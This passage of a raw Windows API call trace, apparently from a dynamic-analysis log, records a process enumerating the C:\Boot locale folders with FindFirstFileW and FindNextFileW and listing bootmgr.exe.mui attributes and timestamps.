ftLastAccessTime.dwLowDateTime=0xac087460, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac087460, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0093.348] FindNextFileW (in: hFindFile=0xb440e8, lpFindFileData=0x6ee8b8 | out: lpFindFileData=0x6ee8b8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac087460, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac087460, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe8510830, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x12650, dwReserved0=0x0, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0093.348] FindNextFileW (in: hFindFile=0xb440e8, lpFindFileData=0x6ee8b8 | out: lpFindFileData=0x6ee8b8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac087460, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac087460, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe8510830, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x12650, dwReserved0=0x0, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 0 [0093.348] FindClose (in: hFindFile=0xb440e8 | out: hFindFile=0xb440e8) returned 1 [0093.348] FindFirstFileW (in: lpFileName="C:\\Boot\\ko-KR\\*", lpFindFileData=0x6ee8e4 | out: lpFindFileData=0x6ee8e4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac087460, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac087460, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac087460, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xb440e8 [0093.348] FindNextFileW (in: hFindFile=0xb440e8, lpFindFileData=0x6ee8f8 | out: lpFindFileData=0x6ee8f8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac087460, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac087460, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac087460, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0093.348] FindNextFileW (in: hFindFile=0xb440e8, lpFindFileData=0x6ee8f8 | out: lpFindFileData=0x6ee8f8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac087460, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac087460, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe8510830, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x12650, dwReserved0=0x0, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0093.348] FindNextFileW (in: hFindFile=0xb440e8, lpFindFileData=0x6ee8f8 | out: lpFindFileData=0x6ee8f8*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0093.348] FindClose (in: hFindFile=0xb440e8 | out: hFindFile=0xb440e8) returned 1 [0093.348] FindFirstFileW (in: lpFileName="C:\\Boot\\nb-NO\\*", lpFindFileData=0x6ee8a4 | out: lpFindFileData=0x6ee8a4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac087460, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0ad5c0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac0ad5c0, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xb440e8 [0093.349] FindNextFileW (in: hFindFile=0xb440e8, lpFindFileData=0x6ee8b8 | out: lpFindFileData=0x6ee8b8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac087460, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0ad5c0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac0ad5c0, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0093.349] FindNextFileW (in: hFindFile=0xb440e8, lpFindFileData=0x6ee8b8 | out: lpFindFileData=0x6ee8b8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac0ad5c0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0ad5c0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xea212efb, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x15850, dwReserved0=0x0, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0093.349] FindNextFileW (in: hFindFile=0xb440e8, lpFindFileData=0x6ee8b8 | out: lpFindFileData=0x6ee8b8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac0ad5c0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0ad5c0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xea212efb, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x15850, dwReserved0=0x0, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 0 [0093.349] FindClose (in: hFindFile=0xb440e8 | out: hFindFile=0xb440e8) returned 1 [0093.349] FindFirstFileW (in: lpFileName="C:\\Boot\\nb-NO\\*", lpFindFileData=0x6ee8e4 | out: lpFindFileData=0x6ee8e4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac087460, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0ad5c0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac0ad5c0, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xb440e8 [0093.349] FindNextFileW (in: hFindFile=0xb440e8, lpFindFileData=0x6ee8f8 | out: lpFindFileData=0x6ee8f8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac087460, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0ad5c0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac0ad5c0, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0093.349] FindNextFileW (in: hFindFile=0xb440e8, lpFindFileData=0x6ee8f8 | out: lpFindFileData=0x6ee8f8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac0ad5c0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0ad5c0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xea212efb, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x15850, dwReserved0=0x0, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0093.349] FindNextFileW (in: hFindFile=0xb440e8, lpFindFileData=0x6ee8f8 | out: lpFindFileData=0x6ee8f8*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0093.349] FindClose (in: hFindFile=0xb440e8 | out: hFindFile=0xb440e8) returned 1 [0093.349] FindFirstFileW (in: lpFileName="C:\\Boot\\nl-NL\\*", lpFindFileData=0x6ee8a4 | out: lpFindFileData=0x6ee8a4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0ad5c0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0ad5c0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac0ad5c0, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xb440e8 [0093.350] FindNextFileW (in: hFindFile=0xb440e8, lpFindFileData=0x6ee8b8 | out: lpFindFileData=0x6ee8b8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0ad5c0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0ad5c0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac0ad5c0, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0093.350] FindNextFileW (in: hFindFile=0xb440e8, lpFindFileData=0x6ee8b8 | out: lpFindFileData=0x6ee8b8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac0ad5c0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0ad5c0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe84c457e, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x16250, dwReserved0=0x0, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0093.350] FindNextFileW (in: hFindFile=0xb440e8, lpFindFileData=0x6ee8b8 | out: lpFindFileData=0x6ee8b8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac0ad5c0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0ad5c0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe84c457e, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x16250, dwReserved0=0x0, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 0 [0093.350] FindClose (in: hFindFile=0xb440e8 | out: hFindFile=0xb440e8) returned 1 [0093.350] FindFirstFileW (in: lpFileName="C:\\Boot\\nl-NL\\*", lpFindFileData=0x6ee8e4 | out: lpFindFileData=0x6ee8e4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0ad5c0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0ad5c0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac0ad5c0, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xb440e8 [0093.350] FindNextFileW (in: hFindFile=0xb440e8, lpFindFileData=0x6ee8f8 | out: lpFindFileData=0x6ee8f8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0ad5c0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0ad5c0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac0ad5c0, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0093.350] FindNextFileW (in: hFindFile=0xb440e8, lpFindFileData=0x6ee8f8 | out: lpFindFileData=0x6ee8f8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac0ad5c0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0ad5c0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe84c457e, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x16250, dwReserved0=0x0, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0093.351] FindNextFileW (in: hFindFile=0xb440e8, lpFindFileData=0x6ee8f8 | out: lpFindFileData=0x6ee8f8*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0093.351] FindClose (in: hFindFile=0xb440e8 | out: hFindFile=0xb440e8) returned 1 [0093.351] FindFirstFileW (in: lpFileName="C:\\Boot\\pl-PL\\*", lpFindFileData=0x6ee8a4 | out: lpFindFileData=0x6ee8a4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0ad5c0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0ad5c0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac0ad5c0, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xb440e8 [0093.351] FindNextFileW (in: hFindFile=0xb440e8, lpFindFileData=0x6ee8b8 | out: lpFindFileData=0x6ee8b8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0ad5c0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0ad5c0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac0ad5c0, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0093.351] FindNextFileW (in: hFindFile=0xb440e8, lpFindFileData=0x6ee8b8 | out: lpFindFileData=0x6ee8b8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac0ad5c0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0ad5c0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe9e5ad4a, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x16250, dwReserved0=0x0, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0093.351] FindNextFileW (in: hFindFile=0xb440e8, lpFindFileData=0x6ee8b8 | out: lpFindFileData=0x6ee8b8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac0ad5c0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0ad5c0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe9e5ad4a, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x16250, dwReserved0=0x0, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 0 [0093.351] FindClose (in: hFindFile=0xb440e8 | out: hFindFile=0xb440e8) returned 1 [0093.351] FindFirstFileW (in: lpFileName="C:\\Boot\\pl-PL\\*", lpFindFileData=0x6ee8e4 | out: lpFindFileData=0x6ee8e4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0ad5c0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0ad5c0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac0ad5c0, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xb440e8 [0093.351] FindNextFileW (in: hFindFile=0xb440e8, lpFindFileData=0x6ee8f8 | out: lpFindFileData=0x6ee8f8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0ad5c0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0ad5c0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac0ad5c0, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0093.351] FindNextFileW (in: hFindFile=0xb440e8, lpFindFileData=0x6ee8f8 | out: lpFindFileData=0x6ee8f8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac0ad5c0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0ad5c0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe9e5ad4a, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x16250, dwReserved0=0x0, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0093.351] FindNextFileW (in: hFindFile=0xb440e8, lpFindFileData=0x6ee8f8 | out: lpFindFileData=0x6ee8f8*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0093.352] FindClose (in: hFindFile=0xb440e8 | out: hFindFile=0xb440e8) returned 1 [0093.352] FindFirstFileW (in: lpFileName="C:\\Boot\\pt-BR\\*", lpFindFileData=0x6ee8a4 | out: lpFindFileData=0x6ee8a4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0ad5c0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0ad5c0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac0ad5c0, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xb440e8 [0093.352] FindNextFileW (in: hFindFile=0xb440e8, lpFindFileData=0x6ee8b8 | out: lpFindFileData=0x6ee8b8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0ad5c0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0ad5c0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac0ad5c0, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0093.353] FindNextFileW (in: hFindFile=0xb440e8, lpFindFileData=0x6ee8b8 | out: lpFindFileData=0x6ee8b8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac0ad5c0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0ad5c0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe83b9c0f, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x16040, dwReserved0=0x0, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0093.353] FindNextFileW (in: hFindFile=0xb440e8, lpFindFileData=0x6ee8b8 | out: lpFindFileData=0x6ee8b8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac0ad5c0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0ad5c0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe83b9c0f, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x16040, dwReserved0=0x0, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 0 [0093.353] FindClose (in: hFindFile=0xb440e8 | out: hFindFile=0xb440e8) returned 1 [0093.353] FindFirstFileW (in: lpFileName="C:\\Boot\\pt-BR\\*", lpFindFileData=0x6ee8e4 | out: lpFindFileData=0x6ee8e4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0ad5c0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0ad5c0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac0ad5c0, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xb440e8 [0093.353] FindNextFileW (in: hFindFile=0xb440e8, lpFindFileData=0x6ee8f8 | out: lpFindFileData=0x6ee8f8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0ad5c0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0ad5c0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac0ad5c0, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0093.353] FindNextFileW (in: hFindFile=0xb440e8, lpFindFileData=0x6ee8f8 | out: lpFindFileData=0x6ee8f8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac0ad5c0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0ad5c0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe83b9c0f, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x16040, dwReserved0=0x0, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0093.353] FindNextFileW (in: hFindFile=0xb440e8, lpFindFileData=0x6ee8f8 | out: lpFindFileData=0x6ee8f8*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0093.353] FindClose (in: hFindFile=0xb440e8 | out: hFindFile=0xb440e8) returned 1 [0093.353] FindFirstFileW (in: lpFileName="C:\\Boot\\pt-PT\\*", lpFindFileData=0x6ee8a4 | out: lpFindFileData=0x6ee8a4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0d3720, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0d3720, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac0d3720, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xb440e8 [0093.353] FindNextFileW (in: hFindFile=0xb440e8, lpFindFileData=0x6ee8b8 | out: lpFindFileData=0x6ee8b8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0d3720, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0d3720, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac0d3720, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0093.353] FindNextFileW (in: hFindFile=0xb440e8, lpFindFileData=0x6ee8b8 | out: lpFindFileData=0x6ee8b8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac0d3720, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0d3720, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe823ce95, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x15e40, dwReserved0=0x0, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0093.353] FindNextFileW (in: hFindFile=0xb440e8, lpFindFileData=0x6ee8b8 | out: lpFindFileData=0x6ee8b8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac0d3720, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0d3720, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe823ce95, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x15e40, dwReserved0=0x0, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 0 [0093.354] FindClose (in: hFindFile=0xb440e8 | out: hFindFile=0xb440e8) returned 1 [0093.354] FindFirstFileW (in: lpFileName="C:\\Boot\\pt-PT\\*", lpFindFileData=0x6ee8e4 | out: lpFindFileData=0x6ee8e4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0d3720, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0d3720, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac0d3720, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xb440e8 [0093.354] FindNextFileW (in: hFindFile=0xb440e8, lpFindFileData=0x6ee8f8 | out: lpFindFileData=0x6ee8f8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0d3720, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0d3720, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac0d3720, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0093.354] FindNextFileW (in: hFindFile=0xb440e8, lpFindFileData=0x6ee8f8 | out: lpFindFileData=0x6ee8f8*(dwFileAttributes=0x20, 